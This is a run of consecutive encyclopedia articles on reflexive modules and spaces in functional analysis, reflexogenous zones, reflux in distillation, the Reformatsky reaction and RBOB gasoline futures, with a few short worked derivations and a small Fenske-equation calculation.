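% Q as a Z-module is torsion-free but not torsionless.
% Any f in Hom_Z(Q, Z) satisfies, for every integer n >= 1,
f(1) = n \, f\!\left(\tfrac{1}{n}\right) \in n\mathbb{Z},
% so f(1) is divisible by every n, forcing f(1) = 0; the same argument
% applies to every rational, hence
\operatorname{Hom}_{\mathbb{Z}}(\mathbb{Q},\mathbb{Z}) = 0,
% and no non-zero element of Q has non-zero image under any functional.
```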
Stephen Chase proved the following characterization of semihereditary rings in connection with torsionless modules:
For any ring R , the following conditions are equivalent: [ 4 ]
(The mixture of left/right adjectives in the statement is not a mistake.) | https://en.wikipedia.org/wiki/Reflexive_module |
In the area of mathematics known as functional analysis , a reflexive space is a locally convex topological vector space for which the canonical evaluation map from X {\displaystyle X} into its bidual (which is the strong dual of the strong dual of X {\displaystyle X} ) is a homeomorphism (or equivalently, a TVS isomorphism ).
A normed space is reflexive if and only if this canonical evaluation map is surjective , in which case this (always linear) evaluation map is an isometric isomorphism and the normed space is a Banach space . Those spaces for which the canonical evaluation map is surjective are called semi-reflexive spaces.
In 1951, R. C. James discovered a Banach space, now known as James' space , that is not reflexive (meaning that the canonical evaluation map is not an isomorphism) but is nevertheless isometrically isomorphic to its bidual (any such isometric isomorphism is necessarily not the canonical evaluation map). So importantly, for a Banach space to be reflexive, it is not enough for it to be isometrically isomorphic to its bidual; it is the canonical evaluation map in particular that has to be a homeomorphism.
Reflexive spaces play an important role in the general theory of locally convex TVSs and in the theory of Banach spaces in particular. Hilbert spaces are prominent examples of reflexive Banach spaces. Reflexive Banach spaces are often characterized by their geometric properties.
Suppose that X {\displaystyle X} is a topological vector space (TVS) over the field F {\displaystyle \mathbb {F} } (which is either the real or complex numbers) whose continuous dual space , X ′ , {\displaystyle X^{\prime },} separates points on X {\displaystyle X} (that is, for any x ∈ X , x ≠ 0 {\displaystyle x\in X,x\neq 0} there exists some x ′ ∈ X ′ {\displaystyle x^{\prime }\in X^{\prime }} such that x ′ ( x ) ≠ 0 {\displaystyle x^{\prime }(x)\neq 0} ).
Let X b ′ {\displaystyle X_{b}^{\prime }} (some texts write X β ′ {\displaystyle X_{\beta }^{\prime }} ) denote the strong dual of X , {\displaystyle X,} which is the vector space X ′ {\displaystyle X^{\prime }} of continuous linear functionals on X {\displaystyle X} endowed with the topology of uniform convergence on bounded subsets of X {\displaystyle X} ;
this topology is also called the strong dual topology and it is the "default" topology placed on a continuous dual space (unless another topology is specified).
If X {\displaystyle X} is a normed space, then the strong dual of X {\displaystyle X} is the continuous dual space X ′ {\displaystyle X^{\prime }} with its usual norm topology.
The bidual of X , {\displaystyle X,} denoted by X ′ ′ , {\displaystyle X^{\prime \prime },} is the strong dual of X b ′ {\displaystyle X_{b}^{\prime }} ; that is, it is the space ( X b ′ ) b ′ . {\displaystyle \left(X_{b}^{\prime }\right)_{b}^{\prime }.} [ 1 ] If X {\displaystyle X} is a normed space, then X ′ ′ {\displaystyle X^{\prime \prime }} is the continuous dual space of the Banach space X b ′ {\displaystyle X_{b}^{\prime }} with its usual norm topology.
For any x ∈ X , {\displaystyle x\in X,} let J x : X ′ → F {\displaystyle J_{x}:X^{\prime }\to \mathbb {F} } be defined by J x ( x ′ ) = x ′ ( x ) , {\displaystyle J_{x}\left(x^{\prime }\right)=x^{\prime }(x),} where J x {\displaystyle J_{x}} is a linear map called the evaluation map at x {\displaystyle x} ;
since J x : X b ′ → F {\displaystyle J_{x}:X_{b}^{\prime }\to \mathbb {F} } is necessarily continuous, it follows that J x ∈ ( X b ′ ) ′ . {\displaystyle J_{x}\in \left(X_{b}^{\prime }\right)^{\prime }.} Since X ′ {\displaystyle X^{\prime }} separates points on X , {\displaystyle X,} the linear map J : X → ( X b ′ ) ′ {\displaystyle J:X\to \left(X_{b}^{\prime }\right)^{\prime }} defined by J ( x ) := J x {\displaystyle J(x):=J_{x}} is injective where this map is called the evaluation map or the canonical map .
Call X {\displaystyle X} semi-reflexive if J : X → ( X b ′ ) ′ {\displaystyle J:X\to \left(X_{b}^{\prime }\right)^{\prime }} is bijective (or equivalently, surjective ) and we call X {\displaystyle X} reflexive if in addition J : X → X ′ ′ = ( X b ′ ) b ′ {\displaystyle J:X\to X^{\prime \prime }=\left(X_{b}^{\prime }\right)_{b}^{\prime }} is an isomorphism of TVSs. [ 1 ] A normable space is reflexive if and only if it is semi-reflexive or equivalently, if and only if the evaluation map is surjective.
Suppose X {\displaystyle X} is a normed vector space over the number field F = R {\displaystyle \mathbb {F} =\mathbb {R} } or F = C {\displaystyle \mathbb {F} =\mathbb {C} } (the real numbers or the complex numbers ), with a norm ‖ ⋅ ‖ . {\displaystyle \|\,\cdot \,\|.} Consider its dual normed space X ′ , {\displaystyle X^{\prime },} that consists of all continuous linear functionals f : X → F {\displaystyle f:X\to \mathbb {F} } and is equipped with the dual norm ‖ ⋅ ‖ ′ {\displaystyle \|\,\cdot \,\|^{\prime }} defined by ‖ f ‖ ′ = sup { | f ( x ) | : x ∈ X , ‖ x ‖ = 1 } . {\displaystyle \|f\|^{\prime }=\sup\{|f(x)|\,:\,x\in X,\ \|x\|=1\}.}
The dual X ′ {\displaystyle X^{\prime }} is a normed space (a Banach space to be precise), and its dual normed space X ′ ′ = ( X ′ ) ′ {\displaystyle X^{\prime \prime }=\left(X^{\prime }\right)^{\prime }} is called bidual space for X . {\displaystyle X.} The bidual consists of all continuous linear functionals h : X ′ → F {\displaystyle h:X^{\prime }\to \mathbb {F} } and is equipped with the norm ‖ ⋅ ‖ ′ ′ {\displaystyle \|\,\cdot \,\|^{\prime \prime }} dual to ‖ ⋅ ‖ ′ . {\displaystyle \|\,\cdot \,\|^{\prime }.} Each vector x ∈ X {\displaystyle x\in X} generates a scalar function J ( x ) : X ′ → F {\displaystyle J(x):X^{\prime }\to \mathbb {F} } by the formula: J ( x ) ( f ) = f ( x ) for all f ∈ X ′ , {\displaystyle J(x)(f)=f(x)\qquad {\text{ for all }}f\in X^{\prime },} and J ( x ) {\displaystyle J(x)} is a continuous linear functional on X ′ , {\displaystyle X^{\prime },} that is, J ( x ) ∈ X ′ ′ . {\displaystyle J(x)\in X^{\prime \prime }.} One obtains in this way a map J : X → X ′ ′ {\displaystyle J:X\to X^{\prime \prime }} called evaluation map , that is linear. It follows from the Hahn–Banach theorem that J {\displaystyle J} is injective and preserves norms: for all x ∈ X ‖ J ( x ) ‖ ′ ′ = ‖ x ‖ , {\displaystyle {\text{ for all }}x\in X\qquad \|J(x)\|^{\prime \prime }=\|x\|,} that is, J {\displaystyle J} maps X {\displaystyle X} isometrically onto its image J ( X ) {\displaystyle J(X)} in X ′ ′ . {\displaystyle X^{\prime \prime }.} Furthermore, the image J ( X ) {\displaystyle J(X)} is closed in X ′ ′ , {\displaystyle X^{\prime \prime },} but it need not be equal to X ′ ′ . {\displaystyle X^{\prime \prime }.}
A normed space X {\displaystyle X} is called reflexive if it satisfies the following equivalent conditions:
A reflexive space X {\displaystyle X} is a Banach space, since X {\displaystyle X} is then isometric to the Banach space X ′ ′ . {\displaystyle X^{\prime \prime }.}
A Banach space X {\displaystyle X} is reflexive if it is linearly isometric to its bidual under this canonical embedding J . {\displaystyle J.} James' space is an example of a non-reflexive space which is linearly isometric to its bidual . Furthermore, the image of James' space under the canonical embedding J {\displaystyle J} has codimension one in its bidual. [ 2 ] A Banach space X {\displaystyle X} is called quasi-reflexive (of order d {\displaystyle d} ) if the quotient X ′ ′ / J ( X ) {\displaystyle X^{\prime \prime }/J(X)} has finite dimension d . {\displaystyle d.}
Since every finite-dimensional normed space is a reflexive Banach space , only infinite-dimensional spaces can be non-reflexive.
If a Banach space Y {\displaystyle Y} is isomorphic to a reflexive Banach space X {\displaystyle X} then Y {\displaystyle Y} is reflexive. [ 3 ]
Every closed linear subspace of a reflexive space is reflexive. The continuous dual of a reflexive space is reflexive. Every quotient of a reflexive space by a closed subspace is reflexive. [ 4 ]
Let X {\displaystyle X} be a Banach space. The following are equivalent.
Since norm-closed convex subsets in a Banach space are weakly closed, [ 10 ] it follows from the third property that closed bounded convex subsets of a reflexive space X {\displaystyle X} are weakly compact. Thus, for every decreasing sequence of non-empty closed bounded convex subsets of X , {\displaystyle X,} the intersection is non-empty. As a consequence, every continuous convex function f {\displaystyle f} on a closed convex subset C {\displaystyle C} of X , {\displaystyle X,} such that the set C t = { x ∈ C : f ( x ) ≤ t } {\displaystyle C_{t}=\{x\in C\,:\,f(x)\leq t\}} is non-empty and bounded for some real number t , {\displaystyle t,} attains its minimum value on C . {\displaystyle C.}
The promised geometric property of reflexive Banach spaces is the following: if C {\displaystyle C} is a closed non-empty convex subset of the reflexive space X , {\displaystyle X,} then for every x ∈ X {\displaystyle x\in X} there exists a c ∈ C {\displaystyle c\in C} such that ‖ x − c ‖ {\displaystyle \|x-c\|} minimizes the distance between x {\displaystyle x} and points of C . {\displaystyle C.} This follows from the preceding result for convex functions, applied to f ( y ) = ‖ y − x ‖ . {\displaystyle f(y)=\|y-x\|.} Note that while the minimal distance between x {\displaystyle x} and C {\displaystyle C} is uniquely defined by x , {\displaystyle x,} the point c {\displaystyle c} is not. The closest point c {\displaystyle c} is unique when X {\displaystyle X} is uniformly convex.
A reflexive Banach space is separable if and only if its continuous dual is separable. This follows from the fact that for every normed space Y , {\displaystyle Y,} separability of the continuous dual Y ′ {\displaystyle Y^{\prime }} implies separability of Y . {\displaystyle Y.} [ 11 ]
Informally, a super-reflexive Banach space X {\displaystyle X} has the following property: given an arbitrary Banach space Y , {\displaystyle Y,} if all finite-dimensional subspaces of Y {\displaystyle Y} have a very similar copy sitting somewhere in X , {\displaystyle X,} then Y {\displaystyle Y} must be reflexive. By this definition, the space X {\displaystyle X} itself must be reflexive. As an elementary example, every Banach space Y {\displaystyle Y} whose two dimensional subspaces are isometric to subspaces of X = ℓ 2 {\displaystyle X=\ell ^{2}} satisfies the parallelogram law , hence [ 12 ] Y {\displaystyle Y} is a Hilbert space, therefore Y {\displaystyle Y} is reflexive. So ℓ 2 {\displaystyle \ell ^{2}} is super-reflexive.
The formal definition does not use isometries, but almost isometries. A Banach space Y {\displaystyle Y} is finitely representable [ 13 ] in a Banach space X {\displaystyle X} if for every finite-dimensional subspace Y 0 {\displaystyle Y_{0}} of Y {\displaystyle Y} and every ϵ > 0 , {\displaystyle \epsilon >0,} there is a subspace X 0 {\displaystyle X_{0}} of X {\displaystyle X} such that the multiplicative Banach–Mazur distance between X 0 {\displaystyle X_{0}} and Y 0 {\displaystyle Y_{0}} satisfies d ( X 0 , Y 0 ) < 1 + ε . {\displaystyle d\left(X_{0},Y_{0}\right)<1+\varepsilon .}
A Banach space finitely representable in ℓ 2 {\displaystyle \ell ^{2}} is a Hilbert space. Every Banach space is finitely representable in c 0 . {\displaystyle c_{0}.} The Lp space L p ( [ 0 , 1 ] ) {\displaystyle L^{p}([0,1])} is finitely representable in ℓ p . {\displaystyle \ell ^{p}.}
A Banach space X {\displaystyle X} is super-reflexive if all Banach spaces Y {\displaystyle Y} finitely representable in X {\displaystyle X} are reflexive, or, in other words, if no non-reflexive space Y {\displaystyle Y} is finitely representable in X . {\displaystyle X.} The notion of ultraproduct of a family of Banach spaces [ 14 ] allows for a concise definition: the Banach space X {\displaystyle X} is super-reflexive when its ultrapowers are reflexive.
James proved that a space is super-reflexive if and only if its dual is super-reflexive. [ 13 ]
One of James' characterizations of super-reflexivity uses the growth of separated trees. [ 15 ] The description of a vectorial binary tree begins with a rooted binary tree labeled by vectors: a tree of height n {\displaystyle n} in a Banach space X {\displaystyle X} is a family of 2 n + 1 − 1 {\displaystyle 2^{n+1}-1} vectors of X , {\displaystyle X,} that can be organized in successive levels, starting with level 0 that consists of a single vector x ∅ , {\displaystyle x_{\varnothing },} the root of the tree, followed, for k = 1 , … , n , {\displaystyle k=1,\ldots ,n,} by a family of 2 k {\displaystyle 2^{k}} vectors forming level k : {\displaystyle k:} { x ε 1 , … , ε k } , ε j = ± 1 , j = 1 , … , k , {\displaystyle \left\{x_{\varepsilon _{1},\ldots ,\varepsilon _{k}}\right\},\quad \varepsilon _{j}=\pm 1,\quad j=1,\ldots ,k,} that are the children of vertices of level k − 1. {\displaystyle k-1.} In addition to the tree structure , it is required here that each vector that is an internal vertex of the tree be the midpoint between its two children: x ∅ = x 1 + x − 1 2 , x ε 1 , … , ε k = x ε 1 , … , ε k , 1 + x ε 1 , … , ε k , − 1 2 , 1 ≤ k < n . {\displaystyle x_{\varnothing }={\frac {x_{1}+x_{-1}}{2}},\quad x_{\varepsilon _{1},\ldots ,\varepsilon _{k}}={\frac {x_{\varepsilon _{1},\ldots ,\varepsilon _{k},1}+x_{\varepsilon _{1},\ldots ,\varepsilon _{k},-1}}{2}},\quad 1\leq k<n.}
Given a positive real number t , {\displaystyle t,} the tree is said to be t {\displaystyle t} -separated if for every internal vertex, the two children are t {\displaystyle t} -separated in the given space norm: ‖ x 1 − x − 1 ‖ ≥ t , ‖ x ε 1 , … , ε k , 1 − x ε 1 , … , ε k , − 1 ‖ ≥ t , 1 ≤ k < n . {\displaystyle \left\|x_{1}-x_{-1}\right\|\geq t,\quad \left\|x_{\varepsilon _{1},\ldots ,\varepsilon _{k},1}-x_{\varepsilon _{1},\ldots ,\varepsilon _{k},-1}\right\|\geq t,\quad 1\leq k<n.}
Theorem. [ 15 ] The Banach space X {\displaystyle X} is super-reflexive if and only if for every t ∈ ( 0 , 2 ] , {\displaystyle t\in (0,2],} there is a number n ( t ) {\displaystyle n(t)} such that every t {\displaystyle t} -separated tree contained in the unit ball of X {\displaystyle X} has height less than n ( t ) . {\displaystyle n(t).}
Uniformly convex spaces are super-reflexive. [ 15 ] Let X {\displaystyle X} be uniformly convex, with modulus of convexity δ X {\displaystyle \delta _{X}} and let t {\displaystyle t} be a real number in ( 0 , 2 ] . {\displaystyle (0,2].} By the properties of the modulus of convexity, a t {\displaystyle t} -separated tree of height n , {\displaystyle n,} contained in the unit ball, must have all points of level n − 1 {\displaystyle n-1} contained in the ball of radius 1 − δ X ( t ) < 1. {\displaystyle 1-\delta _{X}(t)<1.} By induction, it follows that all points of level n − j {\displaystyle n-j} are contained in the ball of radius ( 1 − δ X ( t ) ) j , j = 1 , … , n . {\displaystyle \left(1-\delta _{X}(t)\right)^{j},\ j=1,\ldots ,n.}
If the height n {\displaystyle n} was so large that ( 1 − δ X ( t ) ) n − 1 < t / 2 , {\displaystyle \left(1-\delta _{X}(t)\right)^{n-1}<t/2,} then the two points x 1 , x − 1 {\displaystyle x_{1},x_{-1}} of the first level could not be t {\displaystyle t} -separated, contrary to the assumption. This gives the required bound n ( t ) , {\displaystyle n(t),} function of δ X ( t ) {\displaystyle \delta _{X}(t)} only.
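Solving the displayed inequality for n makes the bound explicit; the rearrangement below is a routine computation added for clarity.

```latex
% A t-separated tree of height n inside the unit ball requires
(1-\delta_X(t))^{\,n-1} \ge \tfrac{t}{2}
\quad\Longleftrightarrow\quad
n \le 1 + \frac{\ln(t/2)}{\ln\bigl(1-\delta_X(t)\bigr)},
% where the inequality flips because both logarithms are negative;
% so n(t) may be taken to be any integer exceeding the right-hand side.
```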
Using the tree-characterization, Enflo proved [ 16 ] that super-reflexive Banach spaces admit an equivalent uniformly convex norm. Trees in a Banach space are a special instance of vector-valued martingales . Adding techniques from scalar martingale theory, Pisier improved Enflo's result by showing [ 17 ] that a super-reflexive space X {\displaystyle X} admits an equivalent uniformly convex norm for which the modulus of convexity satisfies, for some constant c > 0 {\displaystyle c>0} and some real number q ≥ 2 , {\displaystyle q\geq 2,} δ X ( t ) ≥ c t q , whenever t ∈ [ 0 , 2 ] . {\displaystyle \delta _{X}(t)\geq c\,t^{q},\quad {\text{ whenever }}t\in [0,2].}
The notion of reflexive Banach space can be generalized to topological vector spaces in the following way.
Let X {\displaystyle X} be a topological vector space over a number field F {\displaystyle \mathbb {F} } (of real numbers R {\displaystyle \mathbb {R} } or complex numbers C {\displaystyle \mathbb {C} } ). Consider its strong dual space X b ′ , {\displaystyle X_{b}^{\prime },} which consists of all continuous linear functionals f : X → F {\displaystyle f:X\to \mathbb {F} } and is equipped with the strong topology b ( X ′ , X ) , {\displaystyle b\left(X^{\prime },X\right),} that is, the topology of uniform convergence on bounded subsets in X . {\displaystyle X.} The space X b ′ {\displaystyle X_{b}^{\prime }} is a topological vector space (to be more precise, a locally convex space), so one can consider its strong dual space ( X b ′ ) b ′ , {\displaystyle \left(X_{b}^{\prime }\right)_{b}^{\prime },} which is called the strong bidual space for X . {\displaystyle X.} It consists of all continuous linear functionals h : X b ′ → F {\displaystyle h:X_{b}^{\prime }\to \mathbb {F} } and is equipped with the strong topology b ( ( X b ′ ) ′ , X b ′ ) . {\displaystyle b\left(\left(X_{b}^{\prime }\right)^{\prime },X_{b}^{\prime }\right).} Each vector x ∈ X {\displaystyle x\in X} generates a map J ( x ) : X b ′ → F {\displaystyle J(x):X_{b}^{\prime }\to \mathbb {F} } by the following formula: J ( x ) ( f ) = f ( x ) , f ∈ X ′ . {\displaystyle J(x)(f)=f(x),\qquad f\in X^{\prime }.} This is a continuous linear functional on X b ′ , {\displaystyle X_{b}^{\prime },} that is, J ( x ) ∈ ( X b ′ ) b ′ . {\displaystyle J(x)\in \left(X_{b}^{\prime }\right)_{b}^{\prime }.} This induces a map called the evaluation map : J : X → ( X b ′ ) b ′ . {\displaystyle J:X\to \left(X_{b}^{\prime }\right)_{b}^{\prime }.} This map is linear. If X {\displaystyle X} is locally convex, from the Hahn–Banach theorem it follows that J {\displaystyle J} is injective and open (that is, for each neighbourhood of zero U {\displaystyle U} in X {\displaystyle X} there is a neighbourhood of zero V {\displaystyle V} in ( X b ′ ) b ′ {\displaystyle \left(X_{b}^{\prime }\right)_{b}^{\prime }} such that J ( U ) ⊇ V ∩ J ( X ) {\displaystyle J(U)\supseteq V\cap J(X)} ). But it can be non-surjective and/or discontinuous.
A locally convex space X {\displaystyle X} is called semi-reflexive if the evaluation map J : X → ( X b ′ ) b ′ {\displaystyle J:X\to \left(X_{b}^{\prime }\right)_{b}^{\prime }} is surjective, and reflexive if, in addition, J {\displaystyle J} is an isomorphism of topological vector spaces.
Theorem [ 19 ] — A locally convex Hausdorff space X {\displaystyle X} is semi-reflexive if and only if X {\displaystyle X} with the σ ( X , X ∗ ) {\displaystyle \sigma (X,X^{*})} -topology has the Heine–Borel property (i.e. weakly closed and bounded subsets of X {\displaystyle X} are weakly compact).
Theorem [ 20 ] [ 21 ] — A locally convex space X {\displaystyle X} is reflexive if and only if it is semi-reflexive and barreled .
Theorem [ 22 ] — The strong dual of a semireflexive space is barrelled.
Theorem [ 23 ] — If X {\displaystyle X} is a Hausdorff locally convex space then the canonical injection from X {\displaystyle X} into its bidual is a topological embedding if and only if X {\displaystyle X} is infrabarreled .
If X {\displaystyle X} is a Hausdorff locally convex space then the following are equivalent:
If X {\displaystyle X} is a Hausdorff locally convex space then the following are equivalent:
If X {\displaystyle X} is a normed space then the following are equivalent:
Theorem [ 29 ] — A real Banach space is reflexive if and only if every pair of non-empty disjoint closed convex subsets, one of which is bounded, can be strictly separated by a hyperplane .
James' theorem — A Banach space B {\displaystyle B} is reflexive if and only if every continuous linear functional on B {\displaystyle B} attains its supremum on the closed unit ball in B . {\displaystyle B.}
A normed space that is semireflexive is a reflexive Banach space. [ 30 ] A closed vector subspace of a reflexive Banach space is reflexive. [ 23 ]
Let X {\displaystyle X} be a Banach space and M {\displaystyle M} a closed vector subspace of X . {\displaystyle X.} If two of X , M , {\displaystyle X,M,} and X / M {\displaystyle X/M} are reflexive then they all are. [ 23 ] This is why reflexivity is referred to as a three-space property . [ 23 ]
If a barreled locally convex Hausdorff space is semireflexive then it is reflexive. [ 1 ]
The strong dual of a reflexive space is reflexive. [ 31 ] Every Montel space is reflexive. [ 26 ] And the strong dual of a Montel space is a Montel space (and thus is reflexive). [ 26 ]
A locally convex Hausdorff reflexive space is barrelled .
If X {\displaystyle X} is a normed space then I : X → X ′ ′ {\displaystyle I:X\to X^{\prime \prime }} is an isometry onto a closed subspace of X ′ ′ . {\displaystyle X^{\prime \prime }.} [ 30 ] This isometry can be expressed by: ‖ x ‖ = sup ‖ x ′ ‖ ≤ 1 x ′ ∈ X ′ , | ⟨ x ′ , x ⟩ | . {\displaystyle \|x\|=\sup _{\stackrel {x^{\prime }\in X^{\prime },}{\|x^{\prime }\|\leq 1}}\left|\left\langle x^{\prime },x\right\rangle \right|.}
Suppose that X {\displaystyle X} is a normed space and X ′ ′ {\displaystyle X^{\prime \prime }} is its bidual equipped with the bidual norm. Then the unit ball of X , {\displaystyle X,} I ( { x ∈ X : ‖ x ‖ ≤ 1 } ) {\displaystyle I(\{x\in X:\|x\|\leq 1\})} is dense in the unit ball { x ′ ′ ∈ X ′ ′ : ‖ x ′ ′ ‖ ≤ 1 } {\displaystyle \left\{x^{\prime \prime }\in X^{\prime \prime }:\left\|x^{\prime \prime }\right\|\leq 1\right\}} of X ′ ′ {\displaystyle X^{\prime \prime }} for the weak topology σ ( X ′ ′ , X ′ ) . {\displaystyle \sigma \left(X^{\prime \prime },X^{\prime }\right).} [ 30 ]
A stereotype space, or polar reflexive space, is defined as a topological vector space (TVS) satisfying a similar condition of reflexivity, but with the topology of uniform convergence on totally bounded subsets (instead of bounded subsets) in the definition of dual space X ′ . {\displaystyle X^{\prime }.} More precisely, a TVS X {\displaystyle X} is called polar reflexive [ 34 ] or stereotype if the evaluation map into the second dual space J : X → X ⋆ ⋆ , J ( x ) ( f ) = f ( x ) , x ∈ X , f ∈ X ⋆ {\displaystyle J:X\to X^{\star \star },\quad J(x)(f)=f(x),\quad x\in X,\quad f\in X^{\star }} is an isomorphism of topological vector spaces . [ 18 ] Here the stereotype dual space X ⋆ {\displaystyle X^{\star }} is defined as the space of continuous linear functionals X ′ {\displaystyle X^{\prime }} endowed with the topology of uniform convergence on totally bounded sets in X {\displaystyle X} (and the stereotype second dual space X ⋆ ⋆ {\displaystyle X^{\star \star }} is the space dual to X ⋆ {\displaystyle X^{\star }} in the same sense).
In contrast to the classical reflexive spaces, the class Ste of stereotype spaces is very wide (it contains, in particular, all Fréchet spaces and thus, all Banach spaces ), it forms a closed monoidal category , and it admits standard operations (defined inside of Ste ) of constructing new spaces, like taking closed subspaces, quotient spaces, projective and injective limits, the space of operators, tensor products, etc. The category Ste has applications in duality theory for non-commutative groups.
Similarly, one can replace the class of bounded (and totally bounded) subsets in X {\displaystyle X} in the definition of dual space X ′ , {\displaystyle X^{\prime },} by other classes of subsets, for example, by the class of compact subsets in X {\displaystyle X} – the spaces defined by the corresponding reflexivity condition are called reflective , [ 35 ] [ 36 ] and they form an even wider class than Ste , but it is not clear (as of 2012) whether this class forms a category with properties similar to those of Ste . | https://en.wikipedia.org/wiki/Reflexive_space
A reflexogenous (reflexogenic) zone (or the receptive field of a reflex ) is the area of the body whose stimulation causes a definite unconditioned reflex . [ 1 ] : vol. II, p. 103 For example, stimulation of the mucosa of the nasopharynx elicits a sneezing reflex, and stimulation of the tracheae and bronchi elicits a coughing reflex. [ 2 ] The receptive fields of various reflexes may overlap, and in consequence a stimulus applied to a certain part of the skin can elicit one reflex or another depending on its strength and the state of the central nervous system . | https://en.wikipedia.org/wiki/Reflexogenous_zone
Reflux is a technique involving the condensation of vapors and the return of this condensate to the system from which it originated. It is used in industrial [ 1 ] and laboratory [ 2 ] distillations . It is also used in chemistry to supply energy to reactions over a long period of time.
The term reflux [ 1 ] [ 3 ] [ 4 ] is very widely used in industries that utilize large-scale distillation columns and fractionators such as petroleum refineries , petrochemical and chemical plants , and natural gas processing plants.
In that context, reflux refers to the portion of the overhead liquid product from a distillation column or fractionator that is returned to the upper part of the column as shown in the schematic diagram of a typical industrial distillation column. Inside the column, the downflowing reflux liquid provides cooling and condensation of the upflowing vapors thereby increasing the efficiency of the distillation column.
The more reflux provided for a given number of theoretical plates , the better the column's separation of lower-boiling materials from higher-boiling materials. Conversely, for a given desired separation, the more reflux is provided, the fewer theoretical plates are required. [ 5 ]
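This trade-off can be made quantitative at the limiting case of total reflux using the Fenske equation, which estimates the minimum number of theoretical stages for a binary separation. The sketch below is a textbook estimate under the assumption of constant relative volatility; the purities and volatility used are illustrative numbers only.

```python
import math

def fenske_min_stages(x_dist, x_bot, alpha):
    """Minimum number of theoretical stages at total reflux (Fenske equation).

    x_dist : mole fraction of the light component in the distillate
    x_bot  : mole fraction of the light component in the bottoms
    alpha  : relative volatility, assumed constant over the column
    """
    ratio = (x_dist / (1 - x_dist)) * ((1 - x_bot) / x_bot)
    return math.log(ratio) / math.log(alpha)

# Illustrative: 95% light component overhead, 5% in the bottoms, alpha = 2.5
print(fenske_min_stages(0.95, 0.05, 2.5))   # about 6.4 stages
```

Operating at any finite reflux requires more stages than this minimum, and as the reflux ratio approaches its own minimum the required number of plates grows without bound, which is the quantitative content of the trade-off described above.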
A mixture of reactants and solvent is placed in a suitable vessel, such as a round bottom flask . This vessel is connected to a water-cooled condenser , which is typically open to the atmosphere at the top. The reaction vessel is heated in order to boil the reaction mixture; vapours produced from the mixture are condensed by the condenser and returned to the vessel under gravity. The purpose is to thermally accelerate the reaction by conducting it at an elevated, controlled temperature (i.e. the solvent 's boiling point ) and ambient pressure without losing large quantities of the mixture. [ 6 ]
The diagram shows a typical reflux apparatus. It includes a water bath to indirectly heat the mixture. As many solvents used are flammable , direct heating with a Bunsen burner is not generally suitable, and alternatives such as a water bath, oil bath , sand bath , electric hot plate or heating mantle are employed. [ 6 ]
The apparatus shown in the diagram represents a batch distillation as opposed to a continuous distillation . The liquid feed mixture to be distilled is placed into the round-bottomed flask along with a few anti-bumping granules , and the fractionating column is fitted into the top. As the mixture is heated and boils, vapor rises up the column. The vapor condenses on the glass platforms (known as plates or trays) inside the column and runs back down into the liquid below, thereby refluxing the upflowing distillate vapor. The hottest tray is at the bottom of the column and the coolest tray is at the top. At steady state conditions, the vapor and liquid on each tray are at equilibrium . Only the most volatile of the vapors stays in gaseous form all the way to the top. The vapor at the top of the column then passes into the condenser , where it cools until it condenses into a liquid. The separation can be enhanced with the addition of more trays (to a practical limitation of heat, flow, etc.). The process continues until all the most volatile components in the liquid feed boil out of the mixture. This point can be recognized by the rise in temperature shown on the thermometer. For continuous distillation , the feed mixture enters in the middle of the column.
By controlling the temperature of the condenser, often called a dephlegmator, a reflux still may be used to ensure that higher boiling point components are returned to the flask while lighter elements are passed out to a secondary condenser. This is useful in producing high quality alcoholic beverages , while ensuring that less desirable components (such as fusel alcohols ) are returned to the primary flask. For high quality neutral spirits (such as vodka ), or post-distillation flavored spirits (gin, absinthe), a process of multiple distillations or charcoal filtering may be applied to obtain a product lacking in any suggestion of its original source material for fermentation . The geometry of the still also plays a role in determining how much reflux occurs. In a pot still , if the tube leading from the boiler to the condenser, the lyne arm , is angled upward, more liquid will have a chance to condense and flow back into the boiler, leading to increased reflux. Typical results can increase production by as much as 50% over the basic worm-type condenser. The addition of a copper "boiling ball" in the path creates an area where expansion of gases into the ball causes cooling and subsequent condensation and reflux. In a column still , the addition of inert materials in the column (e.g., packing) creates surfaces for early condensation and leads to increased reflux. [ citation needed ] | https://en.wikipedia.org/wiki/Reflux
The Reformatsky reaction (sometimes transliterated as Reformatskii reaction ) is an organic reaction which condenses aldehydes or ketones with α-halo esters using metallic zinc to form β-hydroxy-esters: [ 1 ] [ 2 ]
The organozinc reagent, also called a 'Reformatsky enolate', is prepared by treating an alpha-halo ester with zinc dust. Reformatsky enolates are less reactive than lithium enolates or Grignard reagents and hence nucleophilic addition to the ester group does not occur. The reaction was discovered by Sergey Nikolaevich Reformatsky .
Some reviews have been published. [ 3 ] [ 4 ]
In addition [ 5 ] to aldehydes and ketones, it has also been shown that the Reformatsky enolate is able to react with acid chlorides , [ 6 ] imines , [ 7 ] nitriles (see Blaise reaction ), and nitrones . [ 8 ] Moreover, [ 5 ] metals other than zinc have also been used, including magnesium , [ 9 ] iron , [ 10 ] cobalt , [ 11 ] nickel , [ 12 ] germanium , [ 13 ] cadmium , [ 14 ] indium , [ 15 ] [ 16 ] barium , [ 17 ] and cerium . [ 18 ] Additionally, [ 5 ] metal salts are also applicable in place of metals, notably samarium(II) iodide , [ 19 ] [ 20 ] chromium(II) chloride , [ 21 ] titanium(II) chloride , [ 22 ] cerium(III) halides such as cerium(III) iodide , [ 23 ] and titanocene(III) chloride . [ 24 ]
The crystal structures of the THF complexes of the Reformatsky reagents tert -butyl bromozincacetate [ 25 ] and ethyl bromozincacetate [ 26 ] have been determined. Both form cyclic eight-membered dimers in the solid state, but differ in stereochemistry: the eight-membered ring in the ethyl derivative adopts a tub-shaped conformation and has cis bromo groups and cis THF ligands, whereas in the tert -butyl derivative, the ring is in a chair form and the bromo groups and THF ligands are trans . Note that, in contrast to lithium and boron enolates, in which the metal(loid)s are bonded exclusively to oxygen, the zinc enolate moiety in the Reformatsky reagents has zinc atoms that are simultaneously O- and C-bound and can therefore be described as " organometallic ".
Zinc metal is inserted into the carbon-halogen bond of the α-haloester by oxidative addition 1 . This compound dimerizes and rearranges to form two zinc enolates 2 . The oxygen on an aldehyde or ketone coordinates to the zinc to form the six-membered chair-like transition state 3 . A rearrangement occurs in which zinc switches to the aldehyde or ketone oxygen and a carbon-carbon bond is formed 4 . Acid workup 5 , 6 removes zinc to yield zinc(II) salts and a β-hydroxy-ester 7 . [ 5 ]
In one variation of the Reformatsky reaction, [ 27 ] an iodolactam is coupled with an aldehyde using triethylborane in toluene at −78 °C. | https://en.wikipedia.org/wiki/Reformatsky_reaction
Reformulated Blendstock for Oxygenate Blending ( RBOB ) is a gasoline futures contract traded on the New York Mercantile Exchange (NYMEX). It is the benchmark futures contract for wholesale gasoline in the United States. [ 1 ]
